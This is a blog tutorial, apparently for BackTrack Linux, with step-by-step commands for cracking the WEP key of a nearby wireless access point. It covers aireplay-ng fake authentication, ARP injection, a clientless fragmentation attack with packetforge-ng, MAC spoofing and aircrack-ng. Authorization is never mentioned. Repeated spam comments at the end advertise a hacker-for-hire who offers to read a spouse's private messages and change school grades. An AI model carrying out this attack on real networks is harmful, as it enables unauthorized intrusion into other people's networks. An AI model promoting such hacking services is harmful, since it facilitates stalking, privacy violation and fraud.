Steps To Be Followed STEP 1 Monitoring Wireless Traffic With Kismet Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like "Hit ctrl+esc to change bios settings". Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear. Type startx to start KDE (a 'windows' like workspace for linux). Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack- >Wireless Tools -> Analyzers - >Kismet. Alternatively you can open a Terminal and type: kismet Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely 'ath0', and sit back as kismet starts detecting networks in range. NOTE: We use kismet for two reasons. 1. To find the bssid, essid, and channel number of the AP you are accessing. 2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device's name just type: iwconfig While kismet detects networks and various clients accessing those networks you might want to type 's' and then 'Q' (case sensitive). This sorts all of the AP's in your area by their signal strength. The default 'autofit' mode that kismet starts up in doesn't allow you much flexibility. By sorting AP's by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP's that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here. Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in 'kwrite' or select it from the start button. In Backtrack's terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for more help with this STEP 2 Collecting Data With Airodump Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type "airodump-ng -h" at the command prompt for additional options. airodump-ng ath0 -w /mnt/hda2/ home/ryan/belkin_slax_rcu 9 1 Breaking down this command: * ath0 is my wireless card * -w tells airodump to write the file to /mnt/hda2/ryan/belkin_slax_rcu * 9 is the channel 9 of my target AP * 1 tells airodump to only collect IVS - the data packets with the WEP key STEP 3 Associate your wireless card with the AP you are accessing. aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0 * -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h * 0 specifies the delay between attacks * -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names * -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP * -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0 * ath0 at the end is my wireless adapters device name in linux STEP 4 Start packet injection with aireplay aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0 * NOTES: -b requires the MAC address of the AP we are accessing. * -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0 * if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M. As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key. If you get a message like this: Notice: got a deauth/disassoc packet. Is the source MAC associated ? Just reassociate with the AP following the instructions on step 3. STEP 5 Decrypting the WEP Key with Aircrack Find the location of the captured IVS file you specified in step 2. Then type in a terminal: aircrack-ng -s /mnt/hda2/home/ belkin_slax_rcu-03.ivs Change /mnt/hda2/home/ belkin_slax_rcu-03.ivs to your file's location Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn't find a key almost immediately, just sit back and wait for more data packets. More Simple.... client less attcak.. here are all commands............ airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 airodump-ng wlan0 Pick your target, copy it's BSSID, press ctrl + C to end airodump. airodump-ng -c (channel) -w wep --bssid (paste AP's mac here) wlan0 Open a new KONSOLE: aireplay-ng -1 0 -a (paste AP) -h 00:11:22:33:44:55 wlan0 aireplay-ng -5 -b (paste AP) -h 00:11:22:33:44:55 wlan0 A packet will pop up, verify that the MAC is the same MAC of your target. Press Y if it is, N if it's not. packetforge-ng -0 -a (paste AP) - h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y ( the .xor filename, starts with fragment..) - w ARP aireplay-ng -2 -r ARP wlan0 Press Y. Will start injecting, data packets will rise like crazy. When enough data is obtained.. aircrack-ng wep-01.cap
Are you willing to know who your spouse really is, if your spouse is cheating just contact cybergoldenhacker he is good at hacking into cell phones,changing school grades and many more this great hacker has also worked for me and i got results of spouse whats-app messages,call logs, text messages, viber,kik, Facebook, emails. deleted text messages and many more this hacker is very fast cheap and affordable he has never disappointed me for once contact him if you have any form of hacking problem am sure he will help you THANK YOU. contact: cybergoldenhacker at gmail dot com
Are you willing to know who your spouse really is, if your spouse is cheating just contact cybergoldenhacker he is good at hacking into cell phones,changing school grades and many more this great hacker has also worked for me and i got results of spouse whats-app messages,call logs, text messages, viber,kik, Facebook, emails. deleted text messages and many more this hacker is very fast cheap and affordable he has never disappointed me for once contact him if you have any form of hacking problem am sure he will help you THANK YOU. contact: cybergoldenhacker at gmail dot com
Are you willing to know who your spouse really is, if your spouse is cheating just contact cybergoldenhacker he is good at hacking into cell phones,changing school grades and many more this great hacker has also worked for me and i got results of spouse whats-app messages,call logs, text messages, viber,kik, Facebook, emails. deleted text messages and many more this hacker is very fast cheap and affordable he has never disappointed me for once contact him if you have any form of hacking problem am sure he will help you THANK YOU.
ReplyDeletecontact: cybergoldenhacker at gmail dot com
ReplyDeleteAre you willing to know who your spouse really is, if your spouse is cheating just contact cybergoldenhacker he is good at hacking into cell phones,changing school grades and many more this great hacker has also worked for me and i got results of spouse whats-app messages,call logs, text messages, viber,kik, Facebook, emails. deleted text messages and many more this hacker is very fast cheap and affordable he has never disappointed me for once contact him if you have any form of hacking problem am sure he will help you THANK YOU.
contact: cybergoldenhacker at gmail dot com